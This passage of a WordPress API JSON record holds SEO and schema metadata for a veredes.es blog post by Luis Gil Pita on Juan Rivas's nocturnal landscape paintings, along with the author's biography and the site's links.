Pita\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/93581b26cf9aac5cdd330a01e481e1c5\"},\"headline\":\"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil Pita\",\"datePublished\":\"2015-11-09T05:01:31+00:00\",\"dateModified\":\"2020-02-10T18:29:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/\"},\"wordCount\":2527,\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/11\\\/Pintos_JR.jpg\",\"keywords\":[\"arte\",\"geograf\u00eda\",\"juan rivas fern\u00e1ndez\",\"Luis Gil Pita\",\"luz\",\"naturaleza\",\"paisaje\",\"pintura\",\"pintura gallega\",\"territorio\"],\"articleSection\":[\"arte\",\"artistas\",\"capturas\",\"pintura\",\"slider principal\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/\",\"name\":\"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/11\\\/Pintos_JR.jpg\",\"datePublished\":\"2015-11-09T05:01:31+00:00\",\"dateModified\":\"2020-02-10T18:29:23+00:00\",\"description\":\"Arquitectura y paisajes nocturnos de Juan Rivas\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#primaryimage\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/11\\\/Pintos_JR.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2015\\\/11\\\/Pintos_JR.jpg\",\"width\":1000,\"height\":597,\"caption\":\"Pintos, 2015, \u00f3leo\\\/lienzo, 35 x 60 cm.\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil Pita\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"description\":\"veredes\",\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"alternateName\":\"veredes\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/veredes.es\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"alternateName\":\"veredes\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"width\":140,\"height\":54,\"caption\":\"veredes, arquitectura y divulgaci\u00f3n\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/x.com\\\/veredes\",\"https:\\\/\\\/instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/es.pinterest.com\\\/veredes\\\/\",\"https:\\\/\\\/www.tumblr.com\\\/veredes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/93581b26cf9aac5cdd330a01e481e1c5\",\"name\":\"Luis Gil Pita\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/luis-gil-pita-96x96.jpg\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/luis-gil-pita-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/luis-gil-pita-96x96.jpg\",\"caption\":\"Luis Gil Pita\"},\"description\":\"Arquitecto por la ETSA en 1997, desde ese a\u00f1o colabora en el estudio de Manuel Gallego Jorreto hasta 1999. Becado de investigaci\u00f3n en Holanda en 2000-1, con un estudio sobre lo fronterizo y liminar en arquitectura, por la Diputaci\u00f3n de A Coru\u00f1a, fue posteriormente Profesor invitado en el \u00e1rea de proyectos de la Facultad de Arquitectura de Guimar\u00e1es, Universidade do Minho, del 2001 hasta el 2007. Desde el inicio de su carrera ha publicado asiduamente art\u00edculos y ha participado como editor en diferentes publicaciones alrededor de la arquitectura.\",\"sameAs\":[\"https:\\\/\\\/gilpitanietopenamariaarquitectos.com\\\/\",\"https:\\\/\\\/www.facebook.com\\\/gilpita\",\"https:\\\/\\\/www.instagram.com\\\/explore\\\/tags\\\/luisgilpita\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/jos-luis-gil-pita-5ba58920\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/luisgilpita\"],\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/author\\\/luis-gil-pita\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil","description":"Arquitectura y paisajes nocturnos de Juan Rivas","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/","og_locale":"es_ES","og_type":"article","og_title":"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil","og_description":"Arquitectura y paisajes nocturnos de Juan Rivas","og_url":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/","og_site_name":"veredes, arquitectura y divulgaci\u00f3n","article_publisher":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_author":"https:\/\/www.facebook.com\/gilpita","article_published_time":"2015-11-09T05:01:31+00:00","article_modified_time":"2020-02-10T18:29:23+00:00","og_image":[{"width":1000,"height":597,"url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg","type":"image\/jpeg"}],"author":"Luis Gil Pita","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/luisgilpita","twitter_site":"@veredes","twitter_misc":{"Escrito por":"Luis Gil Pita","Tiempo de lectura":"12 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#article","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/"},"author":{"name":"Luis Gil Pita","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/93581b26cf9aac5cdd330a01e481e1c5"},"headline":"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil Pita","datePublished":"2015-11-09T05:01:31+00:00","dateModified":"2020-02-10T18:29:23+00:00","mainEntityOfPage":{"@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/"},"wordCount":2527,"publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"image":{"@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg","keywords":["arte","geograf\u00eda","juan rivas fern\u00e1ndez","Luis Gil Pita","luz","naturaleza","paisaje","pintura","pintura gallega","territorio"],"articleSection":["arte","artistas","capturas","pintura","slider principal"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/","url":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/","name":"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#primaryimage"},"image":{"@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg","datePublished":"2015-11-09T05:01:31+00:00","dateModified":"2020-02-10T18:29:23+00:00","description":"Arquitectura y paisajes nocturnos de Juan Rivas","breadcrumb":{"@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#primaryimage","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2015\/11\/Pintos_JR.jpg","width":1000,"height":597,"caption":"Pintos, 2015, \u00f3leo\/lienzo, 35 x 60 cm."},{"@type":"BreadcrumbList","@id":"https:\/\/veredes.es\/blog\/arquitectura-y-paisajes-nocturnos-de-juan-rivas-luis-gil\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/veredes.es\/blog\/"},{"@type":"ListItem","position":2,"name":"Arquitectura y paisajes nocturnos de Juan Rivas | Luis Gil Pita"}]},{"@type":"WebSite","@id":"https:\/\/veredes.es\/blog\/#website","url":"https:\/\/veredes.es\/blog\/","name":"veredes, arquitectura y divulgaci\u00f3n","description":"veredes","publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"alternateName":"veredes","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/veredes.es\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/veredes.es\/blog\/#organization","name":"veredes, arquitectura y divulgaci\u00f3n","alternateName":"veredes","url":"https:\/\/veredes.es\/blog\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2021\/12\/veredes-logo-centrado_140x54.png","width":140,"height":54,"caption":"veredes, arquitectura y divulgaci\u00f3n"},"image":{"@id":"https:\/\/veredes.es\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","https:\/\/x.com\/veredes","https:\/\/instagram.com\/veredes\/","https:\/\/www.linkedin.com\/company\/veredes-arquitectura-y-divulgacion\/","https:\/\/es.pinterest.com\/veredes\/","https:\/\/www.tumblr.com\/veredes"]},{"@type":"Person","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/93581b26cf9aac5cdd330a01e481e1c5","name":"Luis Gil Pita","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/luis-gil-pita-96x96.jpg","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/luis-gil-pita-96x96.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/04\/luis-gil-pita-96x96.jpg","caption":"Luis Gil Pita"},"description":"Arquitecto por la ETSA en 1997, desde ese a\u00f1o colabora en el estudio de Manuel Gallego Jorreto hasta 1999. Becado de investigaci\u00f3n en Holanda en 2000-1, con un estudio sobre lo fronterizo y liminar en arquitectura, por la Diputaci\u00f3n de A Coru\u00f1a, fue posteriormente Profesor invitado en el \u00e1rea de proyectos de la Facultad de Arquitectura de Guimar\u00e1es, Universidade do Minho, del 2001 hasta el 2007. Desde el inicio de su carrera ha publicado asiduamente art\u00edculos y ha participado como editor en diferentes publicaciones alrededor de la arquitectura.","sameAs":["https:\/\/gilpitanietopenamariaarquitectos.com\/","https:\/\/www.facebook.com\/gilpita","https:\/\/www.instagram.com\/explore\/tags\/luisgilpita\/","https:\/\/www.linkedin.com\/in\/jos-luis-gil-pita-5ba58920\/","https:\/\/x.com\/https:\/\/twitter.com\/luisgilpita"],"url":"https:\/\/veredes.es\/blog\/author\/luis-gil-pita\/"}]}},"_links":{"self":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/58085","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/users\/53"}],"replies":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/comments?post=58085"}],"version-history":[{"count":0,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/posts\/58085\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media\/58112"}],"wp:attachment":[{"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/media?parent=58085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/categories?post=58085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/veredes.es\/blog\/wp-json\/wp\/v2\/tags?post=58085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}